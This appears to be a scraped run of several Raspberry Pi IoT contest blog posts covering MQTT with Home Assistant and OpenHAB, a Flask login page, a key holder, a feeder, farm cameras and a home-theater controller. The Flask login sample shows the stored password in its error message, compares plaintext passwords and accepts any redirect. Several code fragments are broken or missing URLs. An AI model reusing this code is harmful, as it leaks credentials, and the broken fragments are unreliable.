next project! Best of luck, Rick As part of this blog post we are going to get the values of the EnOcean Temperature sensor and the Magnetic Contact switch which is attached to the door to check if the door is Open/Closed, to Home-Assistant which is installed on the Hub. The EnOcean module is connected to the Raspberry Pi B+ which we used to automate the blinds (,Pi Control Hub:Spoke2:Blinds Automationblog post) which shows you how to install FHEM home automation server and run the python program ,which takes advantage for the FHEM server telnet port, to rotate a gear motor that opens and closes the blinds To send the EnOcean temperature and magnetic contact values to the Hub via MQTT, we will have to install a MQTT broker on the Hub's Pi 3, for which we will use Mosquitto(An Open Source MQTT v3.1 Broker ) and install a MQTT client on the Pi B+ which is attached to the EnOcean Module used for the blinds automation setup.. Here are the steps to follow #1 Install Mosquitto on the Hub's Pi 3 to use the new repository, first import the repository package signing key using the commands below wget sudo apt-key add mosquitto-repo.gpg.key Then make the repository available to apt cd /etc/apt/sources.list.d/ sudo wget Now to install the mqtt mosquitto for the raspberry pi , run an update followed by an install sudo apt-get update sudo apt-get install mosquitto #2 to test setup we will also install mosquitto-client sudo apt-get install mosquitto-clients #3 Run a quick test locally on the Pi 3 Open two terminal, in one window create a topic using the command mosquitto_sub -d -t topic_tes And in the second terminal window, send a message to the topic mosquitto_pub -d -t topic_test -m "Hello Pi3" #4 As part of the Home- Assistant add the following to the configuration.yaml file To integrate MQTT into Home Assistant, add the following section mqtt: broker: 192.168.0.24 port: 1883 client_id: home-assistant-1 keepalive: 60 protocol: 3.1 where the broker is the Ip Address of your pi For more info check out - In addition, add the following to the configuration.yaml file as a door OPEN/CLOSE sensor binary_sensor: platform: mqtt state_topic: "home/door" name: "Door" qos: 0 payload_on: "ON" payload_off: "OFF" sensor_class: opening And to get the value of the EnOcean Temperature sensor add following under the sensor section sensor: - platform: mqtt state_topic: "home/temperature" command_topic: "home/temperature" name: "EnOcean Temperature" qos: 0 unit_of_measurement: "°C" #5 on the Pi B+ install MQTT client paho Paho makes communicating with an MQTT server installed on the Pi 3 very simple and can be easily used as part of python program, we will install paho-mqtt using pip , sudo apt-get install python-pip sudo pip install paho-mqtt #6 Lets run a simple python program on the Pi B+, to check if we are able to send data to the MQTT broker on the Pi3 Here is a sample python program , change the hostname value to Pi3 aka the Hub's ip address and the Topic values should match the values above that we entered in the configuration.yaml file. import paho.mqtt.publish as publish import time print("Sending EnOcean Magnetic Contact value") publish.single("home/door", "ON", hostname="192.168.0.24") time.sleep(5) print("Sending EnOcean Temperature value") publish.single("home/temperature", "28", hostname="192.168.0.24") print("Sending EnOcean Magnetic Contact value") publish.single("home/door", "OFF", hostname="192.168.0.24") time.sleep(5) print("Sending EnOcean Magnetic Contact value") publish.single("home/door", "ON", hostname="192.168.0.24") time.sleep(5) print("Sending EnOcean Temperature value") publish.single("home/temperature", "26", hostname="192.168.0.24") Now when you run the following program you should see sensor values for Enocean Temperature and Door on the home assistant dashboard update #7 Run the program to update values from the EnOcean sensor from the Pi B+ to the Pi 3 import telnetlib import paho.mqtt.publish as publish import time #Connection details to the fhem server installed on the same Pi #For the telnet details check out URL - HOST = "127.0.0.1" PORT = 7072 tell = telnetlib.Telnet() #Connecting to the fhem server tell.open(HOST,PORT) #Send command to intiantiate fhem server to get the data tell.write("inform on\n") def string_after(s, delim): return s.partition(delim)[2] while True: #get the value after the carriage return output = tell.read_until("\n") #Check the value of the Magnet Contact Transmitter module - Door open close if "contact" in output: print output if "closed" in output: print "Mangentic contact closed" print("Sending EnOcean Magnetic Contact value - ON") #Sending data to door open/close value to topic, change Ip address to the Ip of the pi with broker publish.single("home/door", "ON", hostname="192.168.0.24") else: print("Sending EnOcean Magnetic Contact value - OFF") publish.single("home/door", "ON", hostname="192.168.0.24") #Checking the temperature sensor #if you get the error-No EEP profile identifier and no Manufacturer ID -wait for the sensor to charge if "sensor" in output: print output delim ="temperature:" print string_after(output, delim) print("Sending EnOcean Temperature value") publish.single("home/temperature", string_after(output, delim), hostname="192.168.0.24") once your done with testing set the program up in the crontab to run continuously in the screen shot above , the left hand side is the terminal running the program above on Pi B+ connected to the EnOcean module, and the right is Home Assistant installed on Pi 3 aka the Hub. There are many different individuals that will need access to the HangarControl system. Pilots may be at home, at their office, or on the road. With that in mind, I wanted to create a single web interface that would accommodate a variety of browsers, including desktop, tablets, and smartphones. To ease the pain of coding HTML for all of the different platforms, I chose to use jQuery Mobile () for the front-end toolset. Don't let anyone fool you -- There is still quite a learning curve when using "the easiest way to build sites and apps that are accessible on all popular smartphone, tablet and desktop devices!" That quote is from the jQuery mobile website. I referred to it often, the quote that is, when I needed to convince myself that front-end coding could be even more difficult. Enough of that, let's move on to the structure. There are many hangars and aircraft that we need to be able to preheat. Once the system is installed, I did not want to have to return each time there was a change to the configuration. The "auto discovery" capabilities in xPL provide for this. Each node (Raspberry Pi + Heater Relay) is flashed with the same image. A node broadcasts it presence and then waits for messages. The web interface of HangarControl provides an Administrator a link to configure each node. Note the "Unconfigured Hangar" below. Clicking on the "49568296" link brings us to a page where the Administrator can name the hangar and airplane. Here is where we can specify how long the heater runs as well as the Raspberry Pi GPIO pin for controlling the heater relay. In Episode #6 ([Pi IoT] Hangar Central #6, Minimal Web Application), I introduced the web application framework, Flask (Welcome | Flask (A Python Microframework) ), which I am using to provide the application environment for HangarControl. Flask provides a number of optional modules that you may use to supplement your project. One of these is Flask-Login, which I am using to aid in session management. Take a look at Episode #8 ([Pi IoT] HangarControl #8.1 -- What's a database? The Movie or [Pi IoT] HangarControl #8, Database? What's a Database?) for a behind the scenes look at integrating with Flask-Login. Since authentication is such an important component of any public facing application, I will show you what you need to write if you plan on using Flask-Login yourself. The main module is named hangarcontrol.py, a boilerplate can be found in Episode #6, ([Pi IoT] Hangar Central #6, Minimal Web Application). To that minimal file, Flask-Login needs to be included. # Include the Flask-Login, session & user management module from flask_login import LoginManager, login_required, login_user, logout_user # The User class with necessary Flask-Login & search methods from lib.user import User # Instantiate flask-login, send our application context, a register a login page login_manager = LoginManager() login_manager.init_app(app) login_manager.login_view = 'login' # The URL for logging in. A user gets directed here automatically # when they select their first page which has been tagged with @login_required @app.route('/login', methods=['GET', 'POST']) def login(): error = None next = request.args.get('next') if request.method == 'POST': user = User.find_by_username(request.form['username']) log.info("login: user=%s", user) if user == None: error = 'Invalid username' elif request.form['password'] != getattr(user,'password'): error = 'Invalid password got=%s, expected=%s' % (request.form['password'], getattr(user,'password')) else: login_user(user,remember=True) flash('You were logged in') # next_is_valid should check if the user has valid # permission to access the `next` url if not next_is_valid(next): return abort(400) return redirect(next or url_for('hangars')) return render_template('login.html', form=form) return render_template('login.html', error=error) # When redirected for login, the URL has a parameter ('next') which # indicates the page to navigate to after a successful login. def next_is_valid(next): return True # Flask-Login needs a method to do user lookups. The user_id is passed from # the login page and we use our "finder" class methods to do a lookup # on our User class. @login_manager.user_loader def load_user(user_id): return User.find_by_username(user_id) # # Produce a list of hangars. Require a valid login before presenting the page. @app.route('/hangars') @login_required def hangars(): hangars = server.getHangarList() return render_template('hangars.html', hangars=hangars) At this point we have a completely function system and pilots are able to request (automated) preheating service. Next up, I'd like to include the SMS and telephone interfaces. Let's see if I have enough time to write it up! Rick This post is about a mini project that I suddenly thought of during the challenge and thought would fit well as part of the larger project The idea was to make a key holder allowing up to four different (sets of) keys. It serves two purposes: a fixed place to hang our keys (we tend to misplace them a lot!) and assuming proper use, could be used as an alternative/additional presence check. For the key holders, I decided to use stereo jacks and panel mount connectors. By shorting the left and right channel in the jack, a loop is created. On the connector, the left channel connects to ground, the right channel connects to a GPIO pin with internal pull-up resistor. When the jack is not inserted the GPIO is HIGH, when inserted, LOW. There is no differentiator per key at the moment, but could be achieved in a future version in different ways: To have everything removable/replaceable, I used male header pins on the connectors and Dupont wires. The ground wire is daisy-chained across all four connectors. This results in a total of five connections to the Raspberry Pi's GPIO header: four GPIO pins and one ground. As a visual aid and indication, every connector is associated to an LED of a certain colour. When the jack is plugged in, the LED is turned off, when removed, turned on. The LEDs are located on a small board which fits straight on the GPIO header, called Blinkt!. Using the python library, the individual LEDs can be controlled. Finally, to turn this key holder in an IoT device, whenever a jack is inserted or removed, an MQTT message is published to the control unit, which can then visualise the status in OpenHAB. From there, rules can be associated to these events. What if the shed was opened while the key was still in place?? Enjoy the gallery illustrating the build process and final result, just after a quick explanation of the code! The code is straightforward, and using the GPIOZero library for the first time, made it even more simple! But basically, the four GPIO pins are checked in an infinite loop. Depending on the state, the matching LED is set or cleared, and an MQTT message is sent. I just realized that the cut off time for submission is 11:59 PM GMT which is a bit sooner than I expected, so here be what I have thus far. After getting the connections completed with the Pi Rack, I moved to working on the Automation application of the Feeder System I have been working on. This has included implementing Mosquitto, Paho, and MQTT for communication between OpenHAB and the feeder system. With this, I can adjust the timer and setting locally on the Feeder System as well as change the Timer, Run the Feeder Manually, view the Pi CAM remotely and be notified when there is motion in the stall. Thus far in the config, I have 3 Topics that get updated at various intervals and events. feeder/timer - Used to notify topic Subscribers that an update to the timer has been performed. This can be accomplished locally via the Pi Face Display and Control interface or remotely from open HAB. feeder/manual - Used to Trigger the feeder system to run in Manual mode thus bypassing any timer settings feeder/motion - Used to notify that there is moved in the Stall via a PIR sensor connected to the Pi Face Digital 2. Within OpenHAB, to handle the user input for setting the Feeder Timer remotely, the following config was implemented. The site was very helpful in getting the Timer section completed: The Initial interface for the OpenHAB config displays the Feeder Timer, an option to set the Timer, Stall CAM (Both Video and Still cam options), The iLumi BLE Lights and EnOcean Energy Harvesting Switches. From the Stall Timer, the user can Set the Timer by setting the Set_Timer switch to on. The will grab the Timer that is site from the OpenHAB interface and send it to the feeder/timer topic which is picked up by the Feeder system. Also, the user can run the Feeder manually from the interface. And, if there is motion, the Stall Motion indicator will be lit. From the interface, the user selects the Time (Hour/Min) and the day to run the timer and once selected, click the Set Timer Switch. sitemap home label="Smart Stall" { Frame label="Stall Timer" { Frame label="Feeder Timer" { Text label="Timer [%s]" item=timerMessage icon="clock" { Frame label="Run Mode" { Switch item=Set_Timer label="Set Timer" Switch item=Manual_Run label="Manual Run" Switch item=Motion_Alert label="Stall Motion" Text item=Motion_Detect } Frame label="Time" { Setpoint item=Set_Hour minValue=0 maxValue=23 step=1 Setpoint item=Set_Minute minValue=0 maxValue=55 step=5 } Frame label="Days" { Switch item=timerMonday Switch item=timerTuesday Switch item=timerWednesday Switch item=timerThursday Switch item=timerFriday Switch item=timerSaturday Switch item=timerSunday } } } Group iLumi Group Feeder Group DaysOfWeek String Feeder_Timer "Get Timer [%s]" <clock> (Feeder, iLumi) {[jiot2:feeder/timer:command:*:default]" } Switch Manual_Run <switch> (Feeder, iLumi) String Run_Manual "[%s]" (Feeder, iLumi) { mqtt=">[jiot2:feeder/manual:command:*:default]" } Number Set_Hour "Hour [%d]" <clock> (Feeder, iLumi) Number Set_Minute "Minute [%d]" <clock> (Feeder, iLumi) Dimmer Set_Day "Day [%s %%]" (Feeder, iLumi) String New_Day "Day [%s]" (Feeder, iLumi) String New_Hour "Hour [%d]" (Feeder, iLumi) String timerMessage "%s" Switch Motion_Alert <siren> (Feeder, iLumi) String Motion_Detect "Switch Motion[%s]" (Feeder, iLumi) { mqtt="<[jiot2:feeder/motion:state:default]" } Switch timerMonday "Monday" <switch> (DaysOfWeek) Switch timerTuesday "Tuesday" <switch> (DaysOfWeek) Switch timerWednesday "Wednesday" <switch> (DaysOfWeek) Switch timerThursday "Thursday" <switch> (DaysOfWeek) Switch timerFriday "Friday" <switch> (DaysOfWeek) Switch timerSaturday "Saturday" <switch> (DaysOfWeek) Switch timerSunday "Sunday" <switch> (DaysOfWeek) var String timerToMQTT = "" rule "Initialization" when System started then postUpdate(Set_Hour, 6) postUpdate(Set_Minute, 15) postUpdate(timerMonday, ON) postUpdate(timerTuesday, OFF) postUpdate(timerWednesday, OFF) postUpdate(timerThursday, OFF) postUpdate(timerFriday, OFF) postUpdate(timerSaturday, OFF) postUpdate(timerSunday, OFF) postUpdata(Manual_Run, OFF) postUpdata(Motion_Alert, OFF) end er rules rule "Set Timer" when Item Set_Hour changed or Item Set_Minute changed then logInfo("Set Timer", "Set Timer") var String msg = "" var String day = "" var String ampm = "" var hour = Set_Hour.state as DecimalType var minute = Set_Minute.state as DecimalType if (timerMonday.state == ON) { day = "Mon" } if (timerTuesday.state == ON) { day = "Tue" } if (timerWednesday.state == ON) { day = "Wed" } if (timerThursday.state == ON) { day = "Thu" } if (timerFriday.state == ON) { day = "Fri" } if (timerSaturday.state == ON) { day = "Sat" } if (timerSunday.state == ON) { day = "Sun" } if (hour < 10) { msg = "0" } msg = msg + Set_Hour.state.format("%d") + ":" if (hour >= 12) {ampm = "PM"} if (hour < 12) {ampm = "AM"} if (minute < 10) { msg + msg = "0" } msg = msg + Set_Minute.state.format("%d") msg = day + " " + msg + " " + ampm postUpdate(timerMessage, msg) timerToMQTT = msg end rule "Set Feed Timer" when Item Set_Timer changed from OFF to ON then var String feed_timer //feed_timer = "Mon 07:30 AM" sendCommand(Send_Timer, timerToMQTT) end rule "Manual Feeder Run" when Item Manual_Run changed from OFF to ON then var String set_manual = "" set_manual = "Run" sendCommand(Run_Manual, set_manual) end rule "Manual Feeder Stop" when Item Manual_Run changed from ON to OFF then var String set_manual = "" set_manual = "Stop" sendCommand(Run_Manual, set_manual) end rule "Motion Detected" when Item Motion_Detect changed then var String motion_message = "" logInfo("Motion Detected", "In Da Motion") motion_message = Motion_Detect.state.toString logInfo("Motion Detected", motion_message) if (motion_message == "Motion Detected") { sendCommand(Motion_Alert, ON) } else { sendCommand(Motion_Alert, OFF) } end mqtt:jiot2.url=tcp://192.168.2.130:1883 # Optional. Client id (max 23 chars) to use when connecting to the broker. # If not provided a default one is generated. #mqtt:<broker>.clientId=<clientId> mqtt:jiot2.clientId=FeedMQTT mqtt-eventbus:broker=jiot2 mqtt-eventbus:commandPublishTopic=feeder/timer/${item}/command mqtt-eventbus:commandSubscribeTopic=feeder/timer/${item}/state mqtt-eventbus:commandPublishTopic=feeder/manual/${item}/command mqtt-eventbus:commandSubscribeTopic=feeder/manual/${item}/state mqtt-eventbus:commandSubscribeTopic=feeder/motion/${item}/state Feeder System Paho config def send_mqtt(message_dict): mqttc = mqtt.Client('python_publisher') mqttc.connect('192.168.2.130', 1883) #message_json2str = json.dumps(message_dict) hourTemp = str(timer_dict['hour']).rjust(2, '0') minTemp = str(timer_dict['min']).rjust(2, '0') message_json2str = timer_dict['day'] + " " + hourTemp + ":" + minTemp + " " + timer_dict['ampm'] mqttc.publish('feeder/timer', message_json2str, retain=True) t.sleep(2) mqttc.disconnect() # The callback for when the client receives a CONNACK response from the server def on_connect(client, userdata, rc): print("Connected with result code "+str(rc)) # Subscribing in on_connect() means that we lose the connect and # reconnect then subscriptions will be renewed client.subscribe([("feeder/timer", 0), ("feeder/manual", 0)]) #client.subscribe("feeder/timer") #client.subscribe("feeder/manual") # The callback forwhen a PUBLISH message is received from the server. def on_message(client, userdata, msg): hourTemp = "" minTemo = "" man_run = "" current_timer = "" #msg_read ="" msg_read = msg.payload.decode('utf-8') #print(msg.topic+" "+str(msg.payload)) print(msg.topic+" "+msg_read) if (msg.topic == "feeder/manual"): man_run = msg_read #man_run = str(msg.payload) print("feeder/manual = %s" % man_run) if ('Run' in man_run): runManual() #client.disconnect() if (msg.topic == "feeder/timer"): timer_data = msg_read if os.path.isfile('timer.json'): with open('timer.json') as datafile: current_timer = json.load(datafile) print("New time message %s " % timer_data) timer_data = timer_data.split() print("Current Timer %s " % current_timer) if current_timer != timer_data: print("New Timer") with open('timer.json', 'w') as outfile: json.dump(timer_data, outfile) timer_dict['day'] = timer_data[0].strip() hour_min = timer_data[1].split(":") timer_dict['hour'] = hour_min[0] timer_dict['min'] = hour_min[1] timer_dict['ampm'] = timer_data[2] saveTimerData(timer_dict) showTimer() #client.disconnect() #hourTemp = str(timer_dict['hour']).rjust(2, '0') #minTemp = str(timer_dict['min']).rjust(2, '0')] #message_json2str = timer_dict['day'] + " " + hourTemp + ":" + minTemp + " " + timer_dict['ampm'] client.disconnect() def getMQTTTimer(): mqttc = mqtt.Client() mqttc.on_connect = on_connect mqttc.on_message = on_message mqttc.connect('192.168.2.130', 1883, 60) ''' if (mqttc.connected is not False): mqttc.connect('192.168.2.130', 1883, 60) #mqttc.loop_start() ''' mqttc.loop_forever(timeout=1.0, max_packets=2, retry_first_connection=False) mqttc.disconnect( The sensor I used for the Motion Sensing is the Parallax PI Sensor rev B. This is connected to the Pi Face Digital 2 Input 3, 5V and Ground. (NOTE: Since the Digital 2 Inputs are by default pulled up to 5V, I ended up having to put a 10K resistor between GND and Pin 3 to pull the pin low when the PIR sensor was on.) import pifacedigitalio as pdio def detectMotion(): MOTION = 0 NO_MOTION = 1 pri1 = NO_MOTION pdio.init() t.sleep(1) while True: pir1 = pdio.digital_read(3,1) if pir1 is MOTION: print ("Motion Detected!") send_message(topic_motion, feeder_broker, "Motion Detected") t.sleep(1) This was started as a Process in Python so it would run parallel in the background to the main app: p = Process(target=getMQTTTimer) m = Process(target=detectMotion) p.start() p.join() m.daemon = False m.start() With all of that, this is what it looks like in the raw, nothing in case at this point. This has been an awesome adventure and I appreciate the opportunity to use the tools given to create a project; I just wish I could have completed it in the time allotted. I'll keep working on this and hopefully get something that is complete be years end. Thanks, Jon In previous blogs i had shared my issues of having the RPi B+ running MotionEyeOs with multiple cameras and wireless networking enabled. Today I have had success getting everything outside and monitoring the Farm! First off, hardwired I have had zero issues with the MotionEyeOs software. I have been able to add cameras and test everything out without any issues other then the RPi B+ is (not surprisingly) noticeably slower for response then the RPi3 that I first used. But once I attempted to go enable WiFi I constantly ran into issues. Finally after creating a brand new image, ensuring all of the WiFi credential information was correct and running off the same AP for all of my communications I was able to get WiFi running last night. Things were looking good. But today when I had reassembled all of my gear and installed it outside I was not able to connect. After verifying power and all connections I could watch the RPi B+ boot up and the WiPi flash but when I tried to connect to the static IP, no luck. After pulling off the extra cameras and trying it just as a base system and still having no luck I decided to completely bring everything back inside and retry it there. Success! Right away I was connected again via Wireless and able to see all 3 cameras. Doing a little research on others experience with the WiPi made it sound like some people had issues with some of the dongles having limited range. Very limited range. This had not been factored into my planning since I have my AP at an outside window and pretty much all of our electronics have been successful connecting from the outside and streaming the kids various flavor of entertainment at that moment. Youtube, Spotify, Netflix, it all was useable. Luckily I had a Realtek wireless dongle and I swapped that in for the WiPi and everything was working again. Outside! MotionEyeOs even automatically adjusted for the different card and I was able to both ping the RPi B+ and connect into the monitoring software. Camera 1 is the baby box monitor, currently looking at the rear of the Momma Rabbit. As of today, no babies, but they are expected soon. Camera 2 is the front of the Momma Rabbits cage, usually she is right there checking things out, but right now she is trying to figure out what that camera is doing in her box. :-) Camera 3 is the View to the Chicken Casa. Here in Camera 1 we can see Momma's Ear, she had just put her eye right up to the camera checking everything out. Here is Momma starting to get a little concerned from all of the camera's and activity. Here I tried to zoom externally on the Chicken Casa Camera, hard to tell but there is a variety of Chickens and G.O.A.Ts scrambling for treats. The image is a lot easier to see on screen then it is when captured. Here is a close up of the Baby Box, I put a block of wood in the corner as a focal point. I quickly shutdown all of the activity around the Rabbits and Monitoring Station to allow Momma to get used to everything. I think I may move Camera 2 over to monitor another part of the Farm and allow for just Camera 1 to watch the Baby Box. Letting her get used to everything. I really like the functionality of the Cameras and will be ordering some more to see about combining cameras to get a broader range of monitoring. I used a clear snack box as a cover for the USB Cameras and it functioned very well. I wanted to add more weather proofing then just having the cameras under a shelter roof. Yes, I like the way the whole setup is working now and look forward to adding/improving upon it! And as a final picture, here is a test run of the efforts of my son and I for making a larger Duck Pond. I wanted to see how level everything is and how long the water naturally stays in our heavy clay area. Eventually a little bridge will be added over that middle giving the ducks more shade to work with and the kids something neat to walk across and see their ducklings. It is now time!! to put the all the electronic components together into a nice enclosure, which I am calling the HUB ,using some 3D printing with Wood filament and some basic wood working using a Dremel tool.Here is a gallery of the finished HUB As part of the build , start of by cutting a couple of Hobby wood board as shown in the pictures below Putting the speakers together, download and 3D print the STL files attached below, using wood filament. Here I am using wood filament to 3D print, so that I can sand it and then Stain it, so that it matches with the wooden fame . Also 3D print a holder for the Sense hat and the Raspberry Pi 3 using wood filament, here is the link to the wood filament I am using from digitmakers.ca Suggest slicer setting to use for 3D printing with wood filament Layer height - 0.2 mm Infill density - 40% Temperature - 200 C Now, lets add a Handle and the 3D printing part for the Pi Camera to top of the Hub frame. To hold the camera I decided to use a flexible gear tie , which means you can point the camera in any direction you want, by warping the gear tie to the handle. For 3D printing the Pi Camera holder I am using black 1.75mm PLA and here are some suggested slicer setting to use for 3D printing with wood filament Layer height - 0.3 mm Infill density - 20% Temperature - 205 C I purchased the handle and the Gear tie at a local hardware store called HomeDepot.ca and also bought matching screws and nuts.. Adding the Pi3 , sense hat and all the other components to the inside of the hub frame. For more info on the speaker circuit and how to setup Mopidy to play music, check out the blog at Pi Control Hub: Music with Mopidy and Home Assistant Now to run Home-Assistant on Pi touch screen as shown in the picture below, we will have to install Chrome. Chromium is not part of the default Raspbian packages , which means we will have to run the following commands to work around this wget -qO - | sudo apt-key add - echo "deb jessie main" | sudo tee -a /etc/apt/sources.list sudo apt-get update sudo apt-get install chromium-browser rpi-youtube -y Here is the link to the Raspberry Pi forum post,where I found this workaround The Plex: @IBAction func playPauseAction(_ sender: AnyObject) { if (playing) { callPlex("pause") } else { callPlex("play") } } @IBAction func stopAction(_ sender: AnyObject) { callPlex("stop") } @IBAction func backAction(_ sender: AnyObject) { callPlex("stepBack") } @IBAction func forwardAction(_ sender: AnyObject) { callPlex("stepForward") } fileprivate func callPlex(_ action: String) { let url = URL(string: "\(clientBaseURL)/player/playback/\(action)?type=video")! var request = URLRequest(url: url) request.setValue("21DA54C6-CAAF-463B-8B2D-E894A3DFB201", forHTTPHeaderField: "X-Plex-Target-Client-Identifier") let task = URLSession.shared.dataTask(with: request) {data, response, error in print("\(response)") } task.resume() }: String guid; URI key; String ratingKey; String sessionKey; State state; String transcodeSession; String url; long viewOffset;: package nl.edubits.thuis.server.plex; @Startup @ApplicationScoped public class PlexObserverBean { @Inject private Controller controller; @Inject private LibraryService libraryService; @Inject MqttService mqttService; private PlaySessionStateNotification playSessionStateNotification; private MediaContainer mediaContainer; public void onPlayingNotification(@Observes @PlexNotification(Type.PLAYING) Notification notification) { if (!notification.getChildren().isEmpty()) { playSessionStateNotification = notification.getChildren().get(0); if (playSessionStateNotification.getState() == State.PLAYING) { controller.run(whenOn(Devices.kitchenMicrowave.off(), Devices.kitchenMicrowave)); controller.run(whenOn(Devices.kitchenCounter.off(), Devices.kitchenCounter)); controller.run(whenOn(Devices.kitchenMain.off(), Devices.kitchenMain)); } mqttService.publishMessage("Thuis/homeTheater/state", playSessionStateNotification.getState().name()); mqttService.publishMessage("Thuis/homeTheater/playing/viewOffset", playSessionStateNotification.getViewOffset() + ""); if (playSessionStateNotification.getKey() != null) { if (mediaContainer != null && !mediaContainer.getVideos().isEmpty() && playSessionStateNotification.getKey().equals(mediaContainer.getVideos().get(0).getKey())) { // No need to retrieve information return; } mediaContainer = libraryService.query(playSessionStateNotification.getKey()); if (!mediaContainer.getVideos().isEmpty()) { Video video = mediaContainer.getVideos().get(0); mqttService.publishMessage("Thuis/homeTheater/playing/title", video.getTitle()); mqttService.publishMessage("Thuis/homeTheater/playing/summary", video.getSummary()); mqttService.publishMessage("Thuis/homeTheater/playing/art", toAbsoluteURL(video.getArt())); mqttService.publishMessage("Thuis/homeTheater/playing/thumb", toAbsoluteURL(video.getThumb())); mqttService.publishMessage("Thuis/homeTheater/playing/grandParentTitle", video.getGrandparentTitle()); mqttService.publishMessage("Thuis/homeTheater/playing/grandParentThumb", toAbsoluteURL(video.getGrandparentThumb())); mqttService.publishMessage("Thuis/homeTheater/playing/duration", video.getDuration() + ""); } } } } }: extension TilesCollectionViewController: MQTTSubscriber { func didReceiveMessage(_ message: MQTTMessage) { guard let payloadString = message.payloadString else { return } if (message.topic == "Thuis/homeTheater/state") { if (payloadString == "PLAYING" && currentState != "PLAYING") { openNowPlaying() navigationItem.rightBarButtonItem = UIBarButtonItem(title: "Now Playing", style: .plain, target: self, action: #selector(OldTilesViewController.openNowPlaying)) } if (payloadString == "STOPPED" && currentState != "STOPPED") { self.presentedViewController?.dismiss(animated: true, completion: nil) navigationItem.rightBarButtonItem = nil } currentState = payloadString } } func openNowPlaying() { DispatchQueue.main.async { self.performSegue(withIdentifier: "nowPlaying", sender: self) } } }: extension UILabel: MQTTSubscriber { func setMQTTTopic(_ topic: String) { MQTT.sharedInstance.subscribe(topic, subscriber: self); } func didReceiveMessage(_ message: MQTTMessage) { if let payloadString = message.payloadString { DispatchQueue.main.async() { self.text = payloadString } } } } Similar extensions are made for the other elements. The result looks like this: Following these steps we set up the Home Theater flow to our iOS app and made sure everything works smoothly. In my opinion it still needs a bit of fine-tuning, but even now it works pretty well! In [Pi IoT] Thuis #11: Final implementation UI design you saw our Thuis iOS app, which has a few buttons for controlling the Home Theater. In this post we'll make sure they work well. For brevity I will describe only the main scene: it makes sure we can watch anything on the Apple TV. Before we can use any devices in Thuis we have to define them. You might remember from [Pi IoT] Thuis #8: Core v2: A Java EE application that we have a class Devices containing static definitions. Here we will add the devices we need for the home theater system: package nl.edubits.thuis.server.devices; public class Devices { public static Computer NAS = new Computer(none, "nas", "nas.local", "admin", "00:22:3F:AA:26:65"); public static AppleTV appleTv = new AppleTV(livingRoomHomeTheater, "appleTv", "10.0.0.30"); public static HomeTheater homeTheater = new HomeTheater(livingRoomHomeTheater, "homeTheater"); public static MqttSwitch tv = new MqttSwitch(livingRoomHomeTheater, "tv"); public static Receiver denon = new Receiver(livingRoomHomeTheater, "denon", "10.0.0.8"); public static MqttSwitch homeTheaterTv = new MqttSwitch(livingRoomHomeTheater, "tvSwitch"); public static MqttSwitch homeTheaterDenon = new MqttSwitch(livingRoomHomeTheater, "denonSwitch"); } The bottom 2 are Z-Wave outlets, which you've seen before. All the others are new types of devices. Below we'll describe each of them separately. Let's start with the easiest device: the television. With the work we did yesterday in Home Theater part 1: CEC we can turn the TV on and off by sending a simple MQTT message. Because of that it's defined as a MqttSwitch. The Apple TV is a great device as the centre of the home theatre. It is able to control other devices through CEC, but unfortunately you can't control it yourself through CEC. So I had to look for an alternative and I found it in AirPlay. Xyrion describes it well how you can wake up an Apple TV by connecting to it using Telnet and telling it to play some bogus video. In Java we can do this by using a Socket. For this we'll create a new Command, the SocketCommand: package nl.edubits.thuis.server.automation.commands; public class SocketCommand implements Command { String hostname; int port; String body; public SocketCommand(String hostname, int port, String body) { // ... } @Override public Message runSingle() { try ( Socket socket = new Socket(hostname, 7000); PrintWriter out = new PrintWriter(socket.getOutputStream(), true); BufferedReader in = new BufferedReader(new InputStreamReader(socket.getInputStream())); ) { out.print(body); out.flush(); logger.info("Socket response: " + in.readLine()); } catch (IOException e) { logger.log(Level.WARNING, "Socket failed", e); } return null; } } We use this command in the definition of the AppleTV itself. By extending MqttSwitch we can leverage the logic for updating its status from MQTT. I'm not entirely sure how we can turn off the Apple TV programmatically, so this method is not implemented yet. package nl.edubits.thuis.server.devices; public class AppleTV extends MqttSwitch implements Switch { String hostname; public AppleTV(Room room, String id, String hostname) { // ... } @Override public Command on() {00, "POST /play HTTP/1.1\n" + "Content-Length: 65\n" + "User-Agent: MediaControl/1.0\n" + "\n" + "Content-Location:\n" + "Start-Position: 0\n" + "\n"); } @Override public Command off() { // TODO } } My AV receiver is Denon AVR-X2000. CEC support on this device is limited, but luckily there is an API. Unfortunately, the API is not documented, but by using the web interface I could reverse engineer it. While it's starting up there are some quirks though as it can take quite a while before the Denon is reachable through the API (while it already works by manually pressing the power button). Because of this we'll use a combination of both CEC and the API. Firstly lets create the Receiver class itself. It's a implementation of MqttSwitch, so the CEC part is easily taken care of. We do override the on() method to make sure it's only fired when needed as this command toggles the power status for the Denon. To get more detailed information on the status and to change volume and inputs we use the API. The API calls are performed by a DenonCommand. package nl.edubits.thuis.server.devices; public class Receiver extends MqttSwitch implements Device, Switch, Singable { private final String hostname; private Status status; private NowPlaying nowPlaying; public Receiver(Room room, String id, String hostname) { // ... } public boolean isFullyOn() { return isOn() && (status == null || status.getZonePower()); } public boolean isFullyOff() { return !isOn() && (status == null || !status.getZonePower()); } @Override public Command on() { if (!isOn()) { return super.on(); } return null; } public DenonCommand volume(double value) { value = Math.max(0, Math.min(98, value)); String volume = (value==0) ? "--" : String.format("%.1f", value-80); return new DenonCommand(this, "PutMasterVolumeSet", volume); } public DenonCommand input(Input input) { return new DenonCommand(this, "PutZone_InputFunction", input.getValue()); } } Due to the time limitations I won't go into the implementation of the API in this post. If you would like to find out more details about this topic, there is a valuable article by Open Remote describing the key possibilities. The NAS runs the Plex Media Server. When nobody is home, the NAS is not used and is turned off by default. The NAS supports Wake-on-LAN (WOL), so we can use this to awake it to make Plex available. For WOL I use a nice little library and built a command around it: package nl.edubits.thuis.server.automation.commands; public class WakeOnLanCommand implements Command { Computer computer; public WakeOnLanCommand(Computer computer) { // ... } @Override public Message runSingle() { try { for (int i = 0; i < 5; i++) { WakeOnLan.wake(computer.getMAC()); } return new Message(String.format("Thuis/computer/%s", computer.getId()), "wake"); } catch (IOException | DecoderException e) { logger.log(Level.WARNING, String.format("Waking up '%s' failed", computer.getId()), e); } return null; } } As the Computer class used for the NAS is just a basic implementation of an Actuator using the WakeOnLanCommand for the wake() method, I would not present the source code here. Now when we almost have all the devices set up we can combine them in scenes. Let's start with some code: public static Scene homeTheaterBase = new Scene("homeTheaterBase", asList( highPriority(homeTheaterDenon.on()), waitForOn(denon.on(), homeTheaterDenon) ), asList( denon.off(), waitForFullyOff(homeTheaterDenon.off(), denon) ) ); public static Scene homeTheater = new Scene("homeTheater", asList( highPriority(NAS.wake()), homeTheaterTv.on(), 